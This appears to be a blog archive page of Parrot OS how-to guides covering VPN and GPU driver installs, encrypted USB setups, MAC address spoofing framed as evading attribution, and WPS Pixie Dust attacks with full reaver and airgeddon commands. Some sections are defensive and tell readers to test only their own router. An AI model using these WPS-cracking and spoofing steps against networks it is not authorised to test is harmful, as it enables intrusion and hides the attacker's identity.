Skip to content
Home » ParrotOS » Page 2

ParrotOS

Parrot Linux OS Information, How-To’s, Tips, Tools, and Guides

INSTALL NORDVPN ON PARROT OS

This is a guide on how I have installed and configured NordVPN to work on Parrot OS

Open a terminal
sudo bash
sh <(curl -sSf https://downloads.nordcdn.com/apps/linux/install.sh

After it installs type
nordvpn login
Enter your username
Enter your password

Once you are logged in type
nordvpn set killswitch on

Select the countries to vpn through by typing
nordvpn countries

Select the country
nordvpn cities Vietnam
Hanoi – will be listed

Now type:
nordvpn connect Vietnam Hanoi

Once you are done with Nord type:
nordvpn disconnect

NVIDIA 1080 TI DRIVER INSTALL ON PARROT OS

This is a tricky one. Getting your NVidia 1080 Ti drivers installed and running on Parrot OS can be a pain. These directions are how to install them on a bare metal system

Open a terminal
Type:
sudo bash
Enter your password

nano /etc/modprobe.d/blacklist-nouveau.conf
Add the following to the file:
blacklist nouveau
blacklist lbm-nouveau
options nouveau modeset=0
alias nouveau off
alias lbm-nouveau off

Save the file, exit, and reboot your system

Once back on the desktop
Open a terminal
Type:
sudo bash
Enter your password
apt-get update && apt install nvidia-driver
Type y when prompted
reboot

Once back on the desktop
Open a terminal
Type:
sudo bash
Enter your password
apt install -y ocl-icd-libopencl1 nvidia-cuda-toolkit
Type y when prompted
reboot

Once back on the desktop
Open a terminal
Type:
sudo bash
Enter your password
nvidia-smi – this will show your card now
hashcat -b – this will run hashcat for your system to show benchmarks

That’s it!

The hardware that I used in this guide:
Gigabyte AORUS GeForce GTX 1080 Ti (QTY 6):
https://amzn.to/2JqvXC8

Motherboard (QTY 1): 
https://amzn.to/2JqGJZ7

CPU (QTY 1): 
https://amzn.to/3qevp2X

Memory (QTY 1): 
https://amzn.to/2JqHn8Z

Hard Drive (QTY 1):  
https://amzn.to/3lic3X5

Risers (QTY 6):  
https://amzn.to/33rIgVE

Power Supplies (QTY 2):
https://amzn.to/3fTRpLR

Add2PSU (QTY 1):
https://amzn.to/39s4URY

Power Switch (QTY 1):  
https://amzn.to/3ljmNVk


CHANGING THE MAC ADDRESS IN PARROT OS

A simple way to prove who was attacking you, is to track their MAC address back to the hardware in their computer. This has helped prove case after case against malicious actors. One way to safeguard against this, is to change your mac address, and luckily this software is readily available in Parrot OS

To change your mac address:
Open a Terminal
Type:
sudo bash
Enter your password
ifconfig
Note the adapters you have, for this, we are going to change our WIreless adapter, named WLAN2
ifconfig WLAN2 down
macchanger -a WLAN2
ifconfig WLAN2 up


That’s it. Your mac address is now spoofed

ENCRYPTED PERSISTENT PARROT OS INSTALL ON USB-C M.2 NVMe 2280 DRIVE

From time to time, I find the need to run Parrot OS, and don’t want to keep an extra computer around to run it on, and running it from a regular USB Drive is too slow. For me to meet my needs, I have installed Parrot OS on a SANDISK USB-C Drive, and used that to create an Encrypted, Persistent USB-C NVME M.2 2280 Drive. Here is how I created the system

Purchase the following:
USB Drive:  
https://amzn.to/3lic3X5

NVME M.2 Drive & USB-C Enclosure:
Western Digital 500GB WD_Black SN750 NVMe
https://amzn.to/3nZ5pH4

Plugable USB C to M.2 NVMe Tool-free Enclosure
https://amzn.to/3lflV3L

Once the hardware arrives you will need to download Parrot OS to your Windows 10 computer
https://www.parrotsec.org/download/

At the time of writing, this is the most recent version of the software:
https://download.parrot.sh/parrot/iso/4.10/Parrot-security-4.10_amd64.iso

Once Parrot OS is downloaded, you will need a way to write it to the SANDISK Usb Drive above using Etcher
Download Etcher from https://www.balena.io/etcher/
Install Etcher onto your Windows 10 computer
Plug your SANDISK USB Drive into the Windows 10 Computer
Open balenaEtcher
Click Select Image
Select your Parrot OS image
Your SANDISK USB Drive should be automatically found and selected by Etcher
Click Flash
The image will now be written to the SANDISK USB Drive
When the image has completed writing you will see the message Flash Complete!
Close Etcher

Assemble your USB-C NVME Drive, and Plug it into a USB-C port on your Windows 10 Computer
Format this drive as ExFat
Once the formatting is complete, Shutdown the computer
And here, I recommend unplugging your Windows drives, to ensure they do not get overwritten

Now, Boot your system to the SANDISK, you can usually do this by pressing F12 during bootup and selecting the SANDISK Drive

From the Parrot OS boot menu, select Encrypted Persistence
Press Enter
Once you are on the Parrot OS Desktop
Double Click Install Parrot
Click Next 3 times
Select Storage Device should show your NVMe Drive
Select it, and click Erase Disk
Place a Checkmark in the box that says Encrypt System
Set the Passphrase, and Confirm it
Click Next
Click Install
Click Install Now
Once it is finished, click Done
Shutdown the system
Remove the Sandisk
AND Finally, boot from the NVMe USB Drive

You are now Running Parrot OS from a removable, and FAST Drive! Congrats!

After you are done using parrot, simply shut it down, unplug the USB-C drive, and boot your computer normally

Make sure you go back and plug back in your Windows drives.

You can now insert the USB-C drive into any computer, and fire it up. Make sure you boot from a USB-C port, instead of the normal SSD/HDD. Most computers will allow you to choose it if you keep tapping F12 during boot.



DISABLE LIGHTS ON GIGABYTE MOTHERBOARDS

Most of my systems are built on linux, and linux does not have the ability to install the RGB Fusion software. For me to disable the lights on the motherboard, I have to do that from the BIOS. Here are the steps I use on my Gigabyte Motherboards:

Boot the computer
Press DEL during the boot to enter the BIOS
Scroll over to the Peripherals tab
Select RGB Fusion
Click OFF
Save & Exit
Reboot and your lights are off

Thanks for reading!

PARROT OS INSTALL ON USB-C M.2 NVMe 2280 DRIVE

From time to time, I find the need to run Parrot OS, and don’t want to keep an extra computer around to run it on, and running it from a regular USB Drive is too slow. For me to meet my needs, I have installed Parrot OS on an NVME M.2 2280 Drive, that is connected to the system using a USB-C Dongle. Here is how I created the system

Purchase the following NVME M.2 Drive & USB-C Enclosure:
Western Digital 500GB WD_Black SN750 NVMe
https://amzn.to/3nZ5pH4

Plugable USB C to M.2 NVMe Tool-free Enclosure
https://amzn.to/3lflV3L

Once the hardware arrives you will need to download Parrot OS to your Windows 10 computer
https://www.parrotsec.org/download/

At the time of writing, this is the most recent version of the software:
https://download.parrot.sh/parrot/iso/4.10/Parrot-security-4.10_amd64.iso

Once Parrot OS is downloaded, you will need a way to write it to the NVME USB Drive
Download Etcher from https://www.balena.io/etcher/
Install Etcher onto your Windows 10 computer
Plug your USB-C NVME Drive into the Windows 10 Computer
Open balenaEtcher
Click Select Image
Select your Parrot OS image
Your USB-C NVME should be automatically found and selected by Etcher
Click Flash
The image will now be written to the USB-C Drive
When the image has completed writing you will see the message Flash Complete!

You can now insert the USB-C drive into any computer, and fire it up. Make sure you boot from a USB-C port, instead of the normal SSD/HDD. Most computers will allow you to choose it if you keep tapping F12 during boot.

After you are done using parrot, simply shut it down, unplug the USB-C drive, and boot your computer normally

Pixie Dust Attacks

Test and Secure YOUR Network Only

Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.

I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.

Open a termina

sudo bash

apt-get update
apt-get upgrade

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

git clone https://github.com/t6x/reaver-wps-fork-t6x

cd reaver-wps-fork-t6x/
cd src/
./configure
make
make install

airmon-ng check kill
airmon-ng start wlan1

‘wash -i {monitor-interface}’

Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong

reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Your attack is now running

How to Install AIRGEDDON

This info is specific to Linux only

Open a terminal

sudo bash

mkdir /tools & cd /tools

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

cd airgeddon

ls

sudo bash

./airgeddon.sh

apt-get install and name of tool thats missing

After the dependencies are all installed, run ./airgeddon.sh and begin the configuration

Select your wireless card

Put wireless card into monitoring mode

Select WPS attacks menu – option 8

Select option 4

Select 2.4 ghz

Testing and Securing Against a WPS Attack

How To Check If You Are Vulnerable, and Then Secure Your Network

First you will want to download and install reaver, wash and airmon-ng.  If you are running Kali or Parrot, it is already there.  You will also need a wireless adapter that is capable of packet injection.  Assuming you have those, you will want to open a terminal and run the following

sudo bash

ifconfig

Note which adapter is your wireless card, that is capable of packet injection.  For the rest of this, lets assume it is wlan0.

airmon-ng check kill

wash -i wlan0

Note the BSSID of your Wireless Access Point / Wireless Router

reaver -i wlan0 -b MacAddressOfMyRouter -vv 

After some time my router/ap gave up the ghost.  It showed my WPS pin.  I am running a wireless router with a Broadcom chip, which is susceptible.

To fix this, I had to log into my wireless router, navigate to the WPS settings, and I changed it from Enabled to Disabled.  I saved the settings, and voila…I haven’t been able to crack the WPS pin again

Install Alfa AWUS036ACH Drivers on ParrotOS

Simple Command To Install Alfa Drivers

Open a terminal and escalate your privelages

sudo bash

ifconfig

Note your wireless adapters…if any are installed

apt-get install realtek-rtl88xxau-dkms

Drivers will install, this may take a few minutes.

Once it is done type the following

ifconfig

You will now see your ALFA wireless card